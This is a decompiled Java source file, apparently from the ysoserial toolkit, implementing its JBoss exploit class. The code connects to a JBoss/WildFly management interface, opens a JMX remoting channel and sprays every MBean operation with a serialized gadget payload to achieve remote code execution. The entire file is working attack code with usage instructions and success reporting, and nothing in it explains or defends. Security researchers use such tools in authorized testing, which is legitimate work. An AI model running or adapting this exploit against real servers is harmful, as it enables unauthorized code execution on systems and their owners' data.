package ysoserial.exploit;

import java.io.IOException;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.net.InetSocketAddress;
import java.net.MalformedURLException;
import java.net.SocketAddress;
import java.net.URI;
import java.security.KeyManagementException;
import java.security.NoSuchAlgorithmException;
import java.security.NoSuchProviderException;
import java.util.HashMap;
import java.util.Map;
import java.util.Set;
import java.util.concurrent.Executor;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import java.util.concurrent.ThreadFactory;
import java.util.concurrent.TimeUnit;
import java.util.logging.Handler;
import java.util.logging.Level;
import java.util.logging.LogManager;
import java.util.logging.LogRecord;
import java.util.logging.Logger;
import javax.management.InstanceNotFoundException;
import javax.management.IntrospectionException;
import javax.management.MBeanOperationInfo;
import javax.management.MBeanServerConnection;
import javax.management.ObjectInstance;
import javax.management.ObjectName;
import javax.management.QueryExp;
import javax.management.ReflectionException;
import javax.management.remote.JMXServiceURL;
import javax.security.auth.callback.Callback;
import javax.security.auth.callback.CallbackHandler;
import javax.security.auth.callback.NameCallback;
import javax.security.auth.callback.PasswordCallback;
import javax.security.auth.callback.UnsupportedCallbackException;
import javax.security.sasl.RealmCallback;
import org.eclipse.aether.repository.Proxy;
import org.jboss.remoting3.Channel;
import org.jboss.remoting3.Connection;
import org.jboss.remoting3.Endpoint;
import org.jboss.remoting3.OpenListener;
import org.jboss.remoting3.Remoting;
import org.jboss.remoting3.remote.HttpUpgradeConnectionProviderFactory;
import org.jboss.remoting3.spi.ConnectionHandler;
import org.jboss.remoting3.spi.ConnectionHandlerContext;
import org.jboss.remoting3.spi.ConnectionHandlerFactory;
import org.jboss.remoting3.spi.ConnectionProvider;
import org.jboss.remoting3.spi.ConnectionProviderContext;
import org.jboss.remoting3.spi.RegisteredService;
import org.jboss.remotingjmx.VersionedConnection;
import org.xnio.FutureResult;
import org.xnio.IoFuture;
import org.xnio.OptionMap;
import org.xnio.Options;
import org.xnio.Xnio;
import org.xnio.XnioWorker;
import org.xnio.ssl.JsseXnioSsl;
import org.xnio.ssl.XnioSsl;
import ysoserial.payloads.ObjectPayload;
import ysoserial.payloads.util.Reflections;

/* loaded from: input_file:ysoserial/exploit/JBoss.class */
public class JBoss {

    /* JADX INFO: Access modifiers changed from: private */
    /* loaded from: input_file:ysoserial/exploit/JBoss$ConnectionHandlerContextImpl.class */
    public static final class ConnectionHandlerContextImpl implements ConnectionHandlerContext {
        private ConnectionProviderContextImpl context;

        public ConnectionHandlerContextImpl(ConnectionProviderContextImpl connectionProviderContextImpl) {
            this.context = connectionProviderContextImpl;
        }

        @Override // org.jboss.remoting3.spi.ConnectionHandlerContext
        public void remoteClosed() {
        }

        @Override // org.jboss.remoting3.spi.ConnectionHandlerContext
        public OpenListener getServiceOpenListener(String str) {
            return null;
        }

        @Override // org.jboss.remoting3.spi.ConnectionHandlerContext
        public RegisteredService getRegisteredService(String str) {
            return null;
        }

        @Override // org.jboss.remoting3.spi.ConnectionHandlerContext
        public ConnectionProviderContext getConnectionProviderContext() {
            return this.context;
        }

        @Override // org.jboss.remoting3.spi.ConnectionHandlerContext
        public Connection getConnection() {
            return null;
        }
    }

    /* JADX INFO: Access modifiers changed from: private */
    /* loaded from: input_file:ysoserial/exploit/JBoss$ConnectionProviderContextImpl.class */
    public static final class ConnectionProviderContextImpl implements ConnectionProviderContext {
        private XnioWorker worker;
        private Endpoint endpoint;
        private Xnio instance = Xnio.getInstance();
        private ExecutorService executor = Executors.newCachedThreadPool(new ThreadFactory() { // from class: ysoserial.exploit.JBoss.ConnectionProviderContextImpl.1
            @Override // java.util.concurrent.ThreadFactory
            public Thread newThread(Runnable runnable) {
                Thread thread = new Thread(runnable, "Worker");
                thread.setDaemon(true);
                return thread;
            }
        });

        public ConnectionProviderContextImpl(OptionMap optionMap, String str) throws IllegalArgumentException, IOException {
            this.worker = this.instance.createWorker(optionMap);
            this.endpoint = Remoting.createEndpoint(str, this.worker, optionMap);
        }

        @Override // org.jboss.remoting3.spi.ConnectionProviderContext
        public XnioWorker getXnioWorker() {
            return this.worker;
        }

        @Override // org.jboss.remoting3.spi.ConnectionProviderContext
        public Xnio getXnio() {
            return this.instance;
        }

        @Override // org.jboss.remoting3.spi.ConnectionProviderContext
        public Executor getExecutor() {
            return this.executor;
        }

        @Override // org.jboss.remoting3.spi.ConnectionProviderContext
        public Endpoint getEndpoint() {
            return this.endpoint;
        }

        @Override // org.jboss.remoting3.spi.ConnectionProviderContext
        public void accept(ConnectionHandlerFactory connectionHandlerFactory) {
            System.err.println("accept");
        }
    }

    /* JADX INFO: Access modifiers changed from: private */
    /* loaded from: input_file:ysoserial/exploit/JBoss$ConsoleLogHandler.class */
    public static final class ConsoleLogHandler extends Handler {
        private ConsoleLogHandler() {
        }

        @Override // java.util.logging.Handler
        public void publish(LogRecord logRecord) {
            System.err.println(logRecord.getMessage());
        }

        @Override // java.util.logging.Handler
        public void flush() {
        }

        @Override // java.util.logging.Handler
        public void close() throws SecurityException {
        }
    }

    public static void main(String[] strArr) {
        if (strArr.length < 3) {
            System.err.println("Usage " + JBoss.class.getName() + " <uri> <payload> <payload_arg>");
            System.exit(-1);
        }
        URI create = URI.create(strArr[0]);
        Object makePayloadObject = ObjectPayload.Utils.makePayloadObject(strArr[1], strArr[2]);
        String str = null;
        String str2 = null;
        if (create.getUserInfo() != null) {
            int indexOf = create.getUserInfo().indexOf(58);
            if (indexOf >= 0) {
                str = create.getUserInfo().substring(0, indexOf);
                str2 = create.getUserInfo().substring(indexOf + 1);
            } else {
                System.err.println("Need <user>:<password>@");
                System.exit(-1);
            }
        }
        doRun(create, makePayloadObject, str, str2);
        ObjectPayload.Utils.releasePayload(strArr[1], makePayloadObject);
    }

    private static void doRun(URI uri, Object obj, String str, String str2) {
        ConnectionProvider connectionProvider = null;
        ConnectionProviderContextImpl connectionProviderContextImpl = null;
        ConnectionHandler connectionHandler = null;
        Channel channel = null;
        VersionedConnection versionedConnection = null;
        try {
            try {
                Logger logger = LogManager.getLogManager().getLogger("");
                logger.addHandler(new ConsoleLogHandler());
                logger.setLevel(Level.INFO);
                OptionMap map = OptionMap.builder().set(Options.SSL_ENABLED, uri.getScheme().equals(Proxy.TYPE_HTTPS)).getMap();
                connectionProviderContextImpl = new ConnectionProviderContextImpl(map, "endpoint");
                connectionProvider = new HttpUpgradeConnectionProviderFactory().createInstance(connectionProviderContextImpl, map);
                connectionHandler = getConnection(new InetSocketAddress(uri.getHost(), uri.getPort() > 0 ? uri.getPort() : 9990), str, str2, connectionProviderContextImpl, connectionProvider, map).createInstance(new ConnectionHandlerContextImpl(connectionProviderContextImpl));
                channel = getChannel(connectionProviderContextImpl, connectionHandler, map);
                System.err.println("Connected");
                versionedConnection = makeVersionedConnection(channel);
                doExploit(obj, versionedConnection.getMBeanServerConnection(null));
                System.err.println("DONE");
                cleanup(connectionProvider, connectionProviderContextImpl, connectionHandler, channel, versionedConnection);
            } catch (Throwable th) {
                th.printStackTrace(System.err);
                cleanup(connectionProvider, connectionProviderContextImpl, connectionHandler, channel, versionedConnection);
            }
        } catch (Throwable th2) {
            cleanup(connectionProvider, connectionProviderContextImpl, connectionHandler, channel, versionedConnection);
            throw th2;
        }
    }

    private static void cleanup(ConnectionProvider connectionProvider, ConnectionProviderContextImpl connectionProviderContextImpl, ConnectionHandler connectionHandler, Channel channel, VersionedConnection versionedConnection) {
        if (versionedConnection != null) {
            versionedConnection.close();
        }
        if (channel != null) {
            try {
                channel.close();
            } catch (IOException e) {
                e.printStackTrace(System.err);
            }
        }
        if (connectionHandler != null) {
            try {
                connectionHandler.close();
            } catch (IOException e2) {
                e2.printStackTrace(System.err);
            }
        }
        if (connectionProvider != null) {
            try {
                connectionProvider.close();
            } catch (IOException e3) {
                e3.printStackTrace(System.err);
            }
        }
        if (connectionProviderContextImpl != null) {
            connectionProviderContextImpl.getXnioWorker().shutdown();
        }
    }

    private static ConnectionHandlerFactory getConnection(SocketAddress socketAddress, final String str, final String str2, ConnectionProviderContextImpl connectionProviderContextImpl, ConnectionProvider connectionProvider, OptionMap optionMap) throws IOException, InterruptedException, KeyManagementException, NoSuchProviderException, NoSuchAlgorithmException {
        XnioSsl jsseXnioSsl = new JsseXnioSsl(connectionProviderContextImpl.getXnio(), optionMap);
        FutureResult futureResult = new FutureResult();
        connectionProvider.connect(null, socketAddress, optionMap, futureResult, new CallbackHandler() { // from class: ysoserial.exploit.JBoss.1
            @Override // javax.security.auth.callback.CallbackHandler
            public void handle(Callback[] callbackArr) throws IOException, UnsupportedCallbackException {
                for (Callback callback : callbackArr) {
                    if (callback instanceof NameCallback) {
                        ((NameCallback) callback).setName(str);
                    } else if (callback instanceof PasswordCallback) {
                        ((PasswordCallback) callback).setPassword(str2 != null ? str2.toCharArray() : new char[0]);
                    } else if (!(callback instanceof RealmCallback)) {
                        System.err.println(callback);
                        throw new UnsupportedCallbackException(callback);
                    }
                }
            }
        }, jsseXnioSsl);
        System.err.println("waiting for connection");
        IoFuture ioFuture = futureResult.getIoFuture();
        IoFuture.Status await = ioFuture.await(5L, TimeUnit.SECONDS);
        if (await == IoFuture.Status.FAILED) {
            System.err.println("Cannot connect");
            if (ioFuture.getException() != null) {
                ioFuture.getException().printStackTrace(System.err);
            }
        } else if (await != IoFuture.Status.DONE) {
            ioFuture.cancel();
            System.err.println("Connect timeout");
            System.exit(-1);
        }
        return (ConnectionHandlerFactory) ioFuture.getInterruptibly();
    }

    private static Channel getChannel(ConnectionProviderContextImpl connectionProviderContextImpl, ConnectionHandler connectionHandler, OptionMap optionMap) throws IOException {
        FutureResult futureResult = new FutureResult(connectionProviderContextImpl.getExecutor());
        connectionHandler.open("jmx", futureResult, optionMap);
        IoFuture ioFuture = futureResult.getIoFuture();
        IoFuture.Status await = ioFuture.await();
        if (await == IoFuture.Status.FAILED) {
            System.err.println("Cannot connect");
            if (ioFuture.getException() != null) {
                throw new IOException("Connect failed", ioFuture.getException());
            }
        } else if (await != IoFuture.Status.DONE) {
            ioFuture.cancel();
            throw new IOException("Connect timeout");
        }
        return (Channel) ioFuture.get();
    }

    private static VersionedConnection makeVersionedConnection(Channel channel) throws ClassNotFoundException, NoSuchMethodException, IllegalAccessException, InvocationTargetException, MalformedURLException {
        Method declaredMethod = Class.forName("org.jboss.remotingjmx.VersionedConectionFactory").getDeclaredMethod("createVersionedConnection", Channel.class, Map.class, JMXServiceURL.class);
        Reflections.setAccessible(declaredMethod);
        return (VersionedConnection) declaredMethod.invoke(null, channel, new HashMap(), new JMXServiceURL("service:jmx:remoting-jmx://"));
    }

    private static void doExploit(Object obj, MBeanServerConnection mBeanServerConnection) throws IOException, InstanceNotFoundException, IntrospectionException, ReflectionException {
        Object[] objArr = {obj};
        System.err.println("Querying MBeans");
        Set<ObjectInstance> queryMBeans = mBeanServerConnection.queryMBeans((ObjectName) null, (QueryExp) null);
        System.err.println("Found " + queryMBeans.size() + " MBeans");
        for (ObjectInstance objectInstance : queryMBeans) {
            for (MBeanOperationInfo mBeanOperationInfo : mBeanServerConnection.getMBeanInfo(objectInstance.getObjectName()).getOperations()) {
                try {
                    mBeanServerConnection.invoke(objectInstance.getObjectName(), mBeanOperationInfo.getName(), objArr, new String[0]);
                    System.err.println(objectInstance.getObjectName() + ":" + mBeanOperationInfo.getName() + " -> SUCCESS");
                    return;
                } catch (Throwable th) {
                    String message = th.getMessage();
                    if (!message.startsWith("java.lang.ClassNotFoundException:")) {
                        System.err.println(objectInstance.getObjectName() + ":" + mBeanOperationInfo.getName() + " -> SUCCESS|ERROR " + message);
                        return;
                    }
                    int indexOf = message.indexOf(34);
                    int indexOf2 = message.indexOf(34, indexOf + 1);
                    String substring = (indexOf < 0 || indexOf2 <= 0) ? "<unknown>" : message.substring(indexOf + 1, indexOf2);
                    if (!"<unknown>".equals(substring) && !"org.jboss.as.jmx:main".equals(substring)) {
                        int indexOf3 = message.indexOf(58);
                        System.err.println(objectInstance.getObjectName() + ":" + mBeanOperationInfo.getName() + " -> FAIL CNFE " + message.substring(indexOf3 + 2, message.indexOf(32, indexOf3 + 2)) + " (" + substring + ")");
                    }
                }
            }
        }
    }
}
